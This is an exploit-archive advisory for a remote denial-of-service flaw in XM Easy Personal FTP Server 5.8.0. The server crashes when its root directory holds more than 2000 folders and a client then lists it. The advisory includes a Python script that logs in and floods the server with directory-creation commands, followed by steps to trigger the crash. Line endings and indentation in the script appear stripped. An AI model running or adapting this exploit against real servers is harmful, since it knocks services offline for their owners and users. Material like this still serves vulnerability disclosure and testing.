[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : XM Easy Personal FTP Server 5.8.0 Remote DoS Vulnerability
# Published : 2009-11-24
# Author : leinakesi
# Previous Title : XM Easy Professional FTP Server 5.8.0 Denial Of Service
# Next Title : TYPSoft 1.10 APPE DELE DOS
Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: Dxmsoft
*******************************************************************************
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
*******************************************************************************
Overview:
XM Easy Personal FTP Server failed to handle more than 2000 files or folders in
the root directory.
*******************************************************************************
Details:
if you could log on the server, take the following steps and the server will
crash which lead to DoS.
1.upload 2000 files or folders.
2.close the current connection.
3.use a ftp client to reconnect the server.
user ...
pass ...
port ...
list ...
crash!!!!!!
*******************************************************************************
Exploit example:
1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymousn")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string='a'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %srn" %username)
r=sock.recv(1024)
sock.send("pass %srn" %passwd)
for i in range(1,200):
sock.send("mkd " + "a" * i +"rn")
print "[-] " + ("mkd " + "a" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
for i in range(1,200):
sock.send("mkd " + "b" * i +"rn")
print "[-] " + ("mkd " + "b" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
for i in range(1,200):
sock.send("mkd " + "c" * i +"rn")
print "[-] " + ("mkd " + "c" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
for i in range(1,200):
sock.send("mkd " + "d" * i +"rn")
print "[-] " + ("mkd " + "d" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
for i in range(1,200):
sock.send("mkd " + "e" * i +"rn")
print "[-] " + ("mkd " + "e" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
for i in range(1,200):
sock.send("mkd " + "f" * i +"rn")
print "[-] " + ("mkd " + "f" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
for i in range(1,200):
sock.send("mkd " + "g" * i +"rn")
print "[-] " + ("mkd " + "g" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
for i in range(1,200):
sock.send("mkd " + "h" * i +"rn")
print "[-] " + ("mkd " + "h" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
for i in range(1,200):
sock.send("mkd " + "i" * i +"rn")
print "[-] " + ("mkd " + "i" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
for i in range(1,200):
sock.send("mkd " + "j" * i +"rn")
print "[-] " + ("mkd " + "j" * i +"rn")
r=sock.recv(1024)
print "[+] " + r + "rn"
sock.close()
sys.exit(0);
2.use a ftp client to reconnect the server
for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir